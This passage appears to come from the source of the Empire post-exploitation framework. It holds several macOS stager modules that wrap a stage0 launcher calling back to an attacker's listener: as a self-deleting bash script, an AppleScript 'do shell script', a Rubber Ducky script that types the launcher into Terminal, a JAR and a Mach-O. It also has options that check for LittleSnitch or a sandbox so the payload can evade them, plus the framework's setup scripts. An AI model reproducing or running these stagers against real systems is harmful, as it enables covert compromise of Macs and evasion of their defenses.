41 |                 'Required'      :   True,
42 |                 'Value'         :   'True'
43 |             },
44 |             'UserAgent' : {
45 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
46 |                 'Required'      :   False,
47 |                 'Value'         :   'default'
48 |             }
49 |         }
50 | 
51 |         # save off a copy of the mainMenu object to access external functionality
52 |         #   like listeners/agent handlers/etc.
53 |         self.mainMenu = mainMenu
54 | 
55 |         for param in params:
56 |             # parameter format is [Name, Value]
57 |             option, value = param
58 |             if option in self.options:
59 |                 self.options[option]['Value'] = value
60 | 
61 |     def generate(self):
62 | 
63 |         # extract all of our options
64 |         language = self.options['Language']['Value']
65 |         listenerName = self.options['Listener']['Value']
66 |         userAgent = self.options['UserAgent']['Value']
67 |         safeChecks = self.options['SafeChecks']['Value']
68 | 
69 |         # generate the launcher code
70 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
71 | 
72 |         if launcher == "":
73 |             print helpers.color("[!] Error in launcher command generation.")
74 |             return ""
75 | 
76 |         else:
77 |             script = "#!/bin/bash\n"
78 |             script += "%s\n" %(launcher)
79 |             script += "rm -f \"$0\"\n"
80 |             script += "exit\n"
81 |             return script
82 | 


--------------------------------------------------------------------------------
/lib/stagers/osx/applescript.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | 
 4 | class Stager:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         self.info = {
 9 |             'Name': 'AppleScript',
10 | 
11 |             'Author': ['@harmj0y'],
12 | 
13 |             'Description': ('Generates AppleScript to execute the Empire stage0 launcher.'),
14 | 
15 |             'Comments': [
16 |                 ''
17 |             ]
18 |         }
19 | 
20 |         # any options needed by the stager, settable during runtime
21 |         self.options = {
22 |             # format:
23 |             #   value_name : {description, required, default_value}
24 |             'Listener' : {
25 |                 'Description'   :   'Listener to generate stager for.',
26 |                 'Required'      :   True,
27 |                 'Value'         :   ''
28 |             },
29 |             'Language' : {
30 |                 'Description'   :   'Language of the stager to generate.',
31 |                 'Required'      :   True,
32 |                 'Value'         :   'python'
33 |             },
34 |             'OutFile' : {
35 |                 'Description'   :   'File to output AppleScript to, otherwise displayed on the screen.',
36 |                 'Required'      :   False,
37 |                 'Value'         :   ''
38 |             },
39 |             'SafeChecks' : {
40 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   'True'
43 |             },
44 |             'UserAgent' : {
45 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
46 |                 'Required'      :   False,
47 |                 'Value'         :   'default'
48 |             }
49 |         }
50 | 
51 |         # save off a copy of the mainMenu object to access external functionality
52 |         #   like listeners/agent handlers/etc.
53 |         self.mainMenu = mainMenu
54 | 
55 |         for param in params:
56 |             # parameter format is [Name, Value]
57 |             option, value = param
58 |             if option in self.options:
59 |                 self.options[option]['Value'] = value
60 | 
61 |     def generate(self):
62 | 
63 |         # extract all of our options
64 |         language = self.options['Language']['Value']
65 |         listenerName = self.options['Listener']['Value']
66 |         userAgent = self.options['UserAgent']['Value']
67 |         safeChecks = self.options['SafeChecks']['Value']
68 | 
69 |         # generate the launcher code
70 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
71 | 
72 |         if launcher == "":
73 |             print helpers.color("[!] Error in launcher command generation.")
74 |             return ""
75 | 
76 |         else:
77 |             launcher = launcher.replace('"', '\\"')
78 | 
79 |             applescript = "do shell script \"%s\"" % (launcher)
80 | 
81 |             return applescript
82 | 


--------------------------------------------------------------------------------
/lib/stagers/osx/ducky.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Stager:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'DuckyLauncher',
 9 | 
10 |             'Author': ['@xorrior'],
11 | 
12 |             'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'),
13 | 
14 |             'Comments': [
15 |                 ''
16 |             ]
17 |         }
18 | 
19 |         # any options needed by the stager, settable during runtime
20 |         self.options = {
21 |             # format:
22 |             #   value_name : {description, required, default_value}
23 |             'Listener' : {
24 |                 'Description'   :   'Listener to generate stager for.',
25 |                 'Required'      :   True,
26 |                 'Value'         :   ''
27 |             },
28 |             'Language' : {
29 |                 'Description'   :   'Language of the stager to generate.',
30 |                 'Required'      :   True,
31 |                 'Value'         :   'python'
32 |             },
33 |             'SafeChecks' : {
34 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   'True'
37 |             },
38 |             'OutFile' : {
39 |                 'Description'   :   'File to output duckyscript to, otherwise displayed on the screen.',
40 |                 'Required'      :   False,
41 |                 'Value'         :   ''
42 |             },
43 |             'UserAgent' : {
44 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
45 |                 'Required'      :   False,
46 |                 'Value'         :   'default'
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         for param in params:
55 |             # parameter format is [Name, Value]
56 |             option, value = param
57 |             if option in self.options:
58 |                 self.options[option]['Value'] = value
59 | 
60 | 
61 |     def generate(self):
62 | 
63 |         # extract all of our options
64 |         language = self.options['Language']['Value']
65 |         listenerName = self.options['Listener']['Value']
66 |         userAgent = self.options['UserAgent']['Value']
67 |         safeChecks = self.options['SafeChecks']['Value']
68 | 
69 |         # generate the launcher code
70 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=safeChecks)
71 |         
72 |         if launcher == "":
73 |             print helpers.color("[!] Error in launcher command generation.")
74 |             return ""
75 |         else:
76 |             
77 |             duckyCode =  "DELAY 1000\n"
78 |             duckyCode += "COMMAND SPACE\n"
79 |             duckyCode += "DELAY 1000\n"
80 |             duckyCode += "STRING TERMINAL\n"
81 |             duckyCode += "ENTER \n"
82 |             duckyCode += "DELAY 1000\n"
83 |             duckyCode += "STRING "+launcher
84 |             duckyCode += "\nENTER\n"
85 |             duckyCode += "DELAY 1000\n"
86 | 
87 |             return duckyCode
88 | 


--------------------------------------------------------------------------------
/lib/stagers/osx/jar.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Stager:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Jar',
 9 | 
10 |             'Author': ['@xorrior'],
11 | 
12 |             'Description': ('Generates a JAR file.'),
13 | 
14 |             'Comments': [
15 |                 ''
16 |             ]
17 |         }
18 | 
19 |         # any options needed by the stager, settable during runtime
20 |         self.options = {
21 |             # format:
22 |             #   value_name : {description, required, default_value}
23 |             'Listener' : {
24 |                 'Description'   :   'Listener to generate stager for.',
25 |                 'Required'      :   True,
26 |                 'Value'         :   ''
27 |             },
28 |             'Language' : {
29 |                 'Description'   :   'Language of the stager to generate.',
30 |                 'Required'      :   True,
31 |                 'Value'         :   'python'
32 |             },
33 |             'SafeChecks' : {
34 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
35 |                 'Required'      :   True,
36 |                 'Value'         :   'True'
37 |             },
38 |             'OutFile' : {
39 |                 'Description'   :   'File to output duckyscript to.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   '/tmp/out.jar'
42 |             },       
43 |             'UserAgent' : {
44 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
45 |                 'Required'      :   False,
46 |                 'Value'         :   'default'
47 |             }
48 |         }
49 | 
50 |         # save off a copy of the mainMenu object to access external functionality
51 |         #   like listeners/agent handlers/etc.
52 |         self.mainMenu = mainMenu
53 | 
54 |         for param in params:
55 |             # parameter format is [Name, Value]
56 |             option, value = param
57 |             if option in self.options:
58 |                 self.options[option]['Value'] = value
59 | 
60 | 
61 |     def generate(self):
62 | 
63 |         # extract all of our options
64 |         language = self.options['Language']['Value']
65 |         listenerName = self.options['Listener']['Value']
66 |         userAgent = self.options['UserAgent']['Value']
67 |         SafeChecks = self.options['SafeChecks']['Value']
68 |         # generate the launcher code
69 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, safeChecks=SafeChecks)
70 |         
71 |         if launcher == "":
72 |             print helpers.color("[!] Error in launcher command generation.")
73 |             return ""
74 |         else:
75 |             launcher = launcher.replace('"','\\"')
76 |             jarBytes = self.mainMenu.stagers.generate_jar(launcherCode=launcher)
77 |             return jarBytes
78 | 


--------------------------------------------------------------------------------
/lib/stagers/osx/launcher.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | 
 4 | class Stager:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         self.info = {
 9 |             'Name': 'Launcher',
10 | 
11 |             'Author': ['@harmj0y'],
12 | 
13 |             'Description': ('Generates a one-liner stage0 launcher for Empire.'),
14 | 
15 |             'Comments': [
16 |                 ''
17 |             ]
18 |         }
19 | 
20 |         # any options needed by the stager, settable during runtime
21 |         self.options = {
22 |             # format:
23 |             #   value_name : {description, required, default_value}
24 |             'Listener' : {
25 |                 'Description'   :   'Listener to generate stager for.',
26 |                 'Required'      :   True,
27 |                 'Value'         :   ''
28 |             },
29 |             'Language' : {
30 |                 'Description'   :   'Language of the stager to generate.',
31 |                 'Required'      :   True,
32 |                 'Value'         :   'python'
33 |             },
34 |             'OutFile' : {
35 |                 'Description'   :   'File to output launcher to, otherwise displayed on the screen.',
36 |                 'Required'      :   False,
37 |                 'Value'         :   ''
38 |             },
39 |             'SafeChecks' : {
40 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   'True'
43 |             },
44 |             'Base64' : {
45 |                 'Description'   :   'Switch. Base64 encode the output.',
46 |                 'Required'      :   True,
47 |                 'Value'         :   'True'
48 |             },            
49 |             'UserAgent' : {
50 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
51 |                 'Required'      :   False,
52 |                 'Value'         :   'default'
53 |             }
54 |         }
55 | 
56 |         # save off a copy of the mainMenu object to access external functionality
57 |         #   like listeners/agent handlers/etc.
58 |         self.mainMenu = mainMenu
59 | 
60 |         for param in params:
61 |             # parameter format is [Name, Value]
62 |             option, value = param
63 |             if option in self.options:
64 |                 self.options[option]['Value'] = value
65 | 
66 |     def generate(self):
67 | 
68 |         # extract all of our options
69 |         language = self.options['Language']['Value']
70 |         listenerName = self.options['Listener']['Value']
71 |         base64 = self.options['Base64']['Value']
72 |         userAgent = self.options['UserAgent']['Value']
73 |         safeChecks = self.options['SafeChecks']['Value']
74 | 
75 |         encode = False
76 |         if base64.lower() == "true":
77 |             encode = True
78 | 
79 |         # generate the launcher code
80 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, userAgent=userAgent, safeChecks=safeChecks)
81 | 
82 |         if launcher == "":
83 |             print helpers.color("[!] Error in launcher command generation.")
84 |             return ""
85 | 
86 |         return launcher
87 | 


--------------------------------------------------------------------------------
/lib/stagers/osx/macho.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | 
 4 | class Stager:
 5 | 
 6 |     def __init__(self, mainMenu, params=[]):
 7 | 
 8 |         self.info = {
 9 |             'Name': 'macho',
10 | 
11 |             'Author': ['@xorrior'],
12 | 
13 |             'Description': ('Generates a macho executable.'),
14 | 
15 |             'Comments': [
16 |                 ''
17 |             ]
18 |         }
19 | 
20 |         # any options needed by the stager, settable during runtime
21 |         self.options = {
22 |             # format:
23 |             #   value_name : {description, required, default_value}
24 |             'Listener' : {
25 |                 'Description'   :   'Listener to generate stager for.',
26 |                 'Required'      :   True,
27 |                 'Value'         :   ''
28 |             },
29 |             'Language' : {
30 |                 'Description'   :   'Language of the stager to generate.',
31 |                 'Required'      :   True,
32 |                 'Value'         :   'python'
33 |             },
34 |             'OutFile' : {
35 |                 'Description'   :   'File to write macho to.',
36 |                 'Required'      :   True,
37 |                 'Value'         :   ''
38 |             },
39 |             'SafeChecks' : {
40 |                 'Description'   :   'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   'True'
43 |             },
44 |             'UserAgent' : {
45 |                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
46 |                 'Required'      :   False,
47 |                 'Value'         :   'default'
48 |             }
49 |         }
50 | 
51 |         # save off a copy of the mainMenu object to access external functionality
52 |         #   like listeners/agent handlers/etc.
53 |         self.mainMenu = mainMenu
54 | 
55 |         for param in params:
56 |             # parameter format is [Name, Value]
57 |             option, value = param
58 |             if option in self.options:
59 |                 self.options[option]['Value'] = value
60 | 
61 |     def generate(self):
62 | 
63 |         # extract all of our options
64 |         language = self.options['Language']['Value']
65 |         listenerName = self.options['Listener']['Value']
66 |         savePath = self.options['OutFile']['Value']
67 |         userAgent = self.options['UserAgent']['Value']
68 |         safeChecks = self.options['SafeChecks']['Value']
69 | 
70 |         # generate the launcher code
71 |         # turn base64 encoding off
72 |         encode = False
73 |         launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, userAgent=userAgent,  safeChecks=safeChecks)
74 | 
75 |         if launcher == "":
76 |             print helpers.color("[!] Error in launcher command generation.")
77 |             return ""
78 | 
79 |         else:
80 | 
81 |             launcher = launcher.strip('echo').strip(' | python &').strip("\"")
82 |             macho = self.mainMenu.stagers.generate_macho(launcher)
83 |             return macho
84 | 


--------------------------------------------------------------------------------
/setup/cert.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # generate a self-signed CERT
 4 | #openssl genrsa -des3 -out ./data/empire.orig.key 2048
 5 | #openssl rsa -in ./data/empire.orig.key -out ./data/empire.key
 6 | #openssl req -new -key ./data/empire.key -out ./data/empire.csr
 7 | #openssl x509 -req -days 365 -in ./data/empire.csr -signkey ./data/empire.key -out ./data/empire.crt
 8 | 
 9 | #openssl req -new -x509 -keyout ../data/empire-priv.key -out ../data/empire-chain.pem -days 365 -nodes
10 | openssl req -new -x509 -keyout ../data/empire-priv.key -out ../data/empire-chain.pem -days 365 -nodes -subj "/C=US" >/dev/null 2>&1
11 | 
12 | echo -e "\n [*] Certificate written to ../data/empire-chain.pem"
13 | echo -e "\r [*] Private key written to ../data/empire-priv.key\n"
14 | 


--------------------------------------------------------------------------------
/setup/reset.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [[ $EUID -ne 0 ]]; then
 4 |    echo " [!]This script must be run as root" 1>&2
 5 |    exit 1
 6 | fi
 7 | 
 8 | IFS='/' read -a array <<< pwd
 9 | 
10 | if [[ "$(pwd)" != *setup ]]
11 | then
12 | 	cd ./setup
13 | fi
14 | 
15 | # reset the database
16 | if [ -e ../data/empire.db ]
17 | then
18 | 	rm ../data/empire.db
19 | fi
20 | 
21 | ./setup_database.py
22 | cd ..
23 | 
24 | # remove the debug file if it exists
25 | if [ -e empire.debug ]
26 | then
27 | 	rm empire.debug
28 | fi
29 | 
30 | # remove the download folders
31 | if [ -d ./downloads/ ]
32 | then
33 | 	rm -rf ./downloads/
34 | fi
35 | 
36 | # start up Empire
37 | # ./empire --debug 2
38 | ./empire
39 | 


--------------------------------------------------------------------------------